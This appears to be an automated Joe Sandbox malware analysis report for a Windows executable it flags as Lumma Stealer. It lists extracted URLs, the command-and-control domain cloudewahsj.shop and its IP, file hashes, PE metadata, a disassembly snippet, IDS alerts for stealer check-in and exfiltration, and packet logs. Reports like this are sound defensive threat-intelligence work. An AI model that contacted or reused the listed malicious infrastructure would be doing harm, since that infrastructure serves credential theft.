https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | rdFy6abQ61.exe, 00000000.00000003.1698894593.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1698748994.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686084920.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E86000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | rdFy6abQ61.exe, 00000000.00000003.1698894593.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1698748994.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686084920.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E86000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micro0 | rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006E2000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cloudewahsj.shop/apil | rdFy6abQ61.exe, 00000000.00000003.1684919180.0000000000696000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685024723.0000000000698000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://x1.c.lencr.org/0 | rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | rdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E61000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.microsof | rdFy6abQ61.exe, 00000000.00000003.1686084920.0000000002ED4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cloudewahsj.shop/C | rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cloudewahsj.shop/ | rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1684919180.0000000000696000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685024723.0000000000698000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000002.1878209398.0000000000713000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | rdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E61000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp | false | |
                                                                          high
                                                                          https://cloudewahsj.shop/apierdFy6abQ61.exe, 00000000.00000003.1699010586.000000000071E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.96.1 | cloudewahsj.shop | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584182
Start date and time: 2025-01-04 15:31:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rdFy6abQ61.exe (renamed because the original name is a hash value)
Original Sample Name: 7a3e26158d0bf299838749875feb6232.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 20
• Number of non-executed functions: 198
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.190.159.75, 20.109.210.53, 4.175.87.197, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
09:31:55 | API Interceptor | 5x Sleep call for process: rdFy6abQ61.exe modified
09:32:15 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.96.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | pelisplus.so/administrator/index.php
104.21.96.1 | Recibos.exe | malicious | FormBook | www.mffnow.info/1a34/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
cloudewahsj.shop | 7z91gvU.exe | malicious | LummaC | 104.21.96.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | HMhdtzxEHf.exe | malicious | DCRat, PureLog Stealer, zgRAT | 104.21.38.84
CLOUDFLARENETUS | 9g9LZNE4bH.exe | malicious | Blank Grabber | 162.159.137.232
CLOUDFLARENETUS | riFSkYVMKB.exe | malicious | Blank Grabber | 162.159.138.232
CLOUDFLARENETUS | 9cOUjp7ybm.exe | malicious | LummaC | 188.114.96.3
CLOUDFLARENETUS | http://livedashboardkit.info | malicious | Unknown | 172.67.166.199
CLOUDFLARENETUS | 4.elf | malicious | Unknown | 1.13.111.69
CLOUDFLARENETUS | 31.13.224.14-mips-2025-01-03T22_14_18.elf | malicious | Mirai | 1.4.15.193
CLOUDFLARENETUS | random.exe | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | random.exe | malicious | Unknown | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | 9cOUjp7ybm.exe | malicious | LummaC | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | random.exe | malicious | Unknown | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | random.exe | malicious | Unknown | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | download.bin.exe | malicious | LummaC | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | hthjjadrthad.exe | malicious | LummaC | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | PO#5_Tower_049.bat | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | HSBC_PAY.SCR.exe | malicious | DBatLoader, FormBook | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | same.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm | 104.21.96.1
a0e9f5d64349fb13191bc781f81f42e1 | nayfObR.exe | malicious | LummaC | 104.21.96.1
No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.063128602020131
Encrypted: false
SSDEEP: 192:gU1LAvomA0U3nnjvEmF5zuiFchZ24IO8ag:LUombU3nnjb5zuiFchY4IO8a
MD5: 0728E80C2FC4ABBEFD975A8706874AE3
SHA1: 9BB17B1F3627267A222631CCA61D4A9055F49269
SHA-256: BABBEEC0E7231D47B4EC91229A1BFC2332F107006A33793AF8AD42E43C93BE0D
SHA-512: 626364515B89D115A6FE6949C2216FF713E32FEBA75D6C40F24BA32EAC403BECBBDE54538837D8C4E8F9BECF28CEA331A86977C284453EBE9B5A2C1E50CD5ACC
Malicious: true
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Sat Jan 4 14:32:02 2025, 0x1205a4 type
Category: dropped
Size (bytes): 109750
Entropy (8bit): 2.164930484042213
Encrypted: false
SSDEEP: 384:EukbSvP2TBcaH00wDMYw1/V/nwuRt7ILywKRsn13HsQG8CNEizkSvI:E7u2TBT7RYw1d90sxtK1
MD5: F90C9D219A8857EE4A0DB1D3EFBBEE48
SHA1: 067B34DAFF08C5FEE782B5881DF5B82006767B3B
SHA-256: 704B6560842FD72E0B2D1599D9E273225456F7DAEA888D958813BE74B6AAC2B7
SHA-512: 7D9464786223FDC3DF787BC4F389652F5F5ADB959CADC7C9FF2E3BD4387E173A1B2E19B4C51829D9535AC5DAA1445AE75664C80C8A483075154AF6E2140F42AC
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8422
Entropy (8bit): 3.6963063697973557
Encrypted: false
SSDEEP: 192:R6l7wVeJ2O6ZG6Y9lLSU98uCqgmfC0pDp89bEXsfBMm:R6lXJP6ZG6YfLSU9TCqgmfCPEcf/
MD5: 61CDB59F52D4EA173FA35E1C9C37DDCD
SHA1: F937F2236F7B7167BF41199F5B3DEC3016B503E5
SHA-256: 31B49261ED1369E63DA27B08DB27ABA68B9D1790B4708F610D63427D5E9FBC3E
SHA-512: 6AB7B5A96ED28A13C3C6B4B99199F6BF4E6B9F8DFD7ADBFFB3E031F78BDD88459CB284FBBD7435F369D24609EEEED4A9348D76E222C1D549CBF8F1DBA4E9E55C
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4724
Entropy (8bit): 4.474764181140522
Encrypted: false
SSDEEP: 48:cvIwWl8zssJg77aI9NaWpW8VYtvYm8M4JHhO3FCWE+q8vwhOam2lDWad:uIjfqI7Pb7V1JB1KgFm2lDWad
MD5: 84AF92B748652CBA231CCE4B3710FB66
SHA1: BA3EC8AF452035AB6FCA6AF97285B52D27DE33B3
SHA-256: 15D0C80538F4503AEA5CE4DCE0EBAC3FA04AA1E79373A9248453307008027345
SHA-512: CE239D6A46092D4F27E15BCD9CA1A892A1E09B8F4586A4805B3599549129737BD90DF32DD6C365AF34565FE46C7F6494457332B860412526112846C8E49F1DBB
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.465432746576597
Encrypted: false
SSDEEP: 6144:MIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNcdwBCswSbB:xXD94+WlLZMM6YFHe+B
MD5: DC328BEB54B3CF7E3D7435DA7498C2F5
SHA1: F812953BF518B3F280564FF22EEBC44EB1600E89
SHA-256: 9A1FAD39A54F19C49DDECBABD99A68B28DAC0B3DF80BD813547C95EAF8F4FB24
SHA-512: 516E76B2A81C1EB406EE65EEBD2ABB57F138C1D1BF1549A5C912F38282B15C6B48B9FD5407D9F43FFE4F919387E45C30A0CFB16620E785BC66F1B312EB4E98EF
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.409084573923632
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: rdFy6abQ61.exe
File size: 324'096 bytes
MD5: 7a3e26158d0bf299838749875feb6232
SHA1: 7ceb291dc9521d49d1e215af7b60b4de187d08d2
SHA256: ad94f681001f2a56ca7bf4396b78e119ba71acca6f14ef6eed2ef54502246985
SHA512: 54b6915cd85463dd5b9d208ea85490df7b7695a7da04325bc12e8454d9ffea1854b7be2868e84c62b0730ce3402aec5654ddf585835d5a14fabbd74e622dcfeb
SSDEEP: 6144:c80tLR1sx/zDkDzcFiyOARwCHCPCeWCzshOZcT:c/tF1sx/zDkDwE/GC6eBzshz
TLSH: 1F64F1523851C073C85795308437EAA86D2EBC726BADC5C773582B7F6E302D1866B3E9
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........$..^El.^El.^El....._El.@...{El.@...DEl.@... El.y...YEl.^Em.$El.@..._El.@..._El.@..._El.Rich^El.................PE..L.....'e...
Icon Hash: 7149552549544443
Entrypoint: 0x40445f
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x6527CCC4 [Thu Oct 12 10:39:00 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 3b02806246eee5fe2c774a0312bca63c
Instruction
call 00007F7194BE6A58h
jmp 00007F7194BE341Eh
mov edi, edi
push ebp
mov ebp, esp
push edi
mov edi, 000003E8h
push edi
call dword ptr [004010ACh]
push dword ptr [ebp+08h]
call dword ptr [004010A8h]
add edi, 000003E8h
cmp edi, 0000EA60h
jnbe 00007F7194BE35A6h
test eax, eax
je 00007F7194BE3580h
pop edi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
call 00007F7194BE3CE9h
push dword ptr [ebp+08h]
call 00007F7194BE3B36h
push dword ptr [00443014h]
call 00007F7194BE46B1h
push 000000FFh
call eax
add esp, 0Ch
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push 00401260h
call dword ptr [004010A8h]
test eax, eax
je 00007F7194BE35B7h
push 00401250h
push eax
call dword ptr [0040105Ch]
test eax, eax
je 00007F7194BE35A7h
push dword ptr [ebp+08h]
call eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007F7194BE356Dh
pop ecx
push dword ptr [ebp+08h]
call dword ptr [004010B0h]
int3
push 00000008h
call 00007F7194BE6BC2h
pop ecx
ret
push 00000008h
call 00007F7194BE6ADFh
pop ecx
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp 00007F7194BE35ADh
mov eax, dword ptr [esi]
test eax, eax
je 00007F7194BE35A4h
Programming Language:
• [C++] VS2008 build 21022
• [ASM] VS2008 build 21022
• [ C ] VS2008 build 21022
• [IMP] VS2005 build 50727
• [RES] VS2008 build 21022
• [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4231c | 0x50 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4e000 | 0x6fd0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2d78 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x194 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x41c52 | 0x41e00 | 2171c2495fccc8a1991d251fa428b621 | False | 0.8846396169354839 | data | 7.828452580141766 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x43000 | 0xac9c | 0x6000 | ca950f2471ca6c99e0633a8c327a5b11 | False | 0.080078125 | data | 0.9604420585282475 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4e000 | 0xcfd0 | 0x7000 | 5af8b791ffa8abc2be49af61907190a1 | False | 0.47879464285714285 | data | 4.780777377767162 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x54280 | 0x330 | Device independent bitmap graphic, 48 x 96 x 1, image size 0 | - | - | 0.1948529411764706
RT_CURSOR | 0x545b0 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | - | - | 0.33223684210526316
RT_ICON | 0x4e390 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Romanian | Romania | 0.43363539445628996
RT_ICON | 0x4f238 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Romanian | Romania | 0.552797833935018
RT_ICON | 0x4fae0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Romanian | Romania | 0.581221198156682
RT_ICON | 0x501a8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Romanian | Romania | 0.6054913294797688
RT_ICON | 0x50710 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Romanian | Romania | 0.4447095435684647
RT_ICON | 0x52cb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Romanian | Romania | 0.4922607879924953
RT_ICON | 0x53d60 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Romanian | Romania | 0.5212765957446809
RT_STRING | 0x54928 | 0x3ce | AmigaOS bitmap font "i", fc_YSize 30720, 19456 elements, 2nd "f", 3rd "v" | Romanian | Romania | 0.4650924024640657
RT_STRING | 0x54cf8 | 0x2d2 | data | Romanian | Romania | 0.4806094182825485
RT_ACCELERATOR | 0x54230 | 0x50 | data | Romanian | Romania | 0.8125
RT_GROUP_CURSOR | 0x546e0 | 0x22 | data | - | - | 1.0294117647058822
RT_GROUP_ICON | 0x541c8 | 0x68 | data | Romanian | Romania | 0.6826923076923077
RT_VERSION | 0x54708 | 0x21c | data | - | - | 0.5166666666666667
DLL | Import
KERNEL32.dll | SetLocaleInfoA, EnumCalendarInfoA, WriteConsoleInputW, InterlockedIncrement, InterlockedDecrement, GetCurrentProcess, InterlockedCompareExchange, SetComputerNameW, FreeEnvironmentStringsA, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsW, SetCommConfig, SwitchToFiber, ReadConsoleInputA, GetAtomNameW, FindNextVolumeMountPointW, GetShortPathNameA, LCMapStringA, InterlockedExchange, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, LoadLibraryA, OpenEventA, FindNextFileA, EnumDateFormatsA, GetModuleHandleA, GetVersionExA, TerminateJobObject, GetCurrentProcessId, FindNextVolumeA, CreateFileA, WriteConsoleW, GetConsoleOutputCP, WriteConsoleA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TerminateProcess, IsDebuggerPresent, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapSize, MultiByteToWideChar, ReadFile, EnterCriticalSection, LeaveCriticalSection, HeapFree, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, SetFilePointer, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RtlUnwind, SetStdHandle, RaiseException, GetLocaleInfoA, WideCharToMultiByte, LCMapStringW, GetStringTypeA, GetStringTypeW, GetConsoleCP, GetConsoleMode, FlushFileBuffers, CloseHandle
USER32.dll | OemToCharA, DdeQueryStringA, GetWindowTextLengthA
SHELL32.dll | DragQueryPoint
Language of compilation system | Country where language is spoken | Map
Romanian | Romania | -
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-04T15:31:55.180569+0100 | 2058606 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop) | 1 | 192.168.2.4 | 55498 | 1.1.1.1 | 53 | UDP
2025-01-04T15:31:55.839962+0100 | 2058607 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) | 1 | 192.168.2.4 | 49731 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:55.839962+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:56.313636+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49731 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:56.313636+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:56.810219+0100 | 2058607 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) | 1 | 192.168.2.4 | 49732 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:56.810219+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:57.341526+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49732 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:57.341526+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49732 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:58.142436+0100 | 2058607 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) | 1 | 192.168.2.4 | 49733 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:58.142436+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:58.815163+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49733 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:59.355446+0100 | 2058607 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) | 1 | 192.168.2.4 | 49734 | 104.21.96.1 | 443 | TCP
2025-01-04T15:31:59.355446+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 104.21.96.1 | 443 | TCP
2025-01-04T15:32:01.043748+0100 | 2058607 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI) | 1 | 192.168.2.4 | 49735 | 104.21.96.1 | 443 | TCP
2025-01-04T15:32:01.043748+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 104.21.96.1 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 4, 2025 15:31:55.196605921 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:55.196636915 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:55.196712971 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:55.199269056 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:55.199284077 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:55.839756012 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:55.839962006 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:55.842062950 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:55.842072964 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:55.842325926 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:55.889393091 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:55.889393091 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:55.889489889 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:56.313641071 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:56.313716888 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:56.313899994 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:56.329380989 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:56.329402924 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:56.329421997 CET | 49731 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:56.329427958 CET | 443 | 49731 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:56.346952915 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:56.346995115 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:56.347063065 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:56.347433090 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:56.347448111 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:56.810153961 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
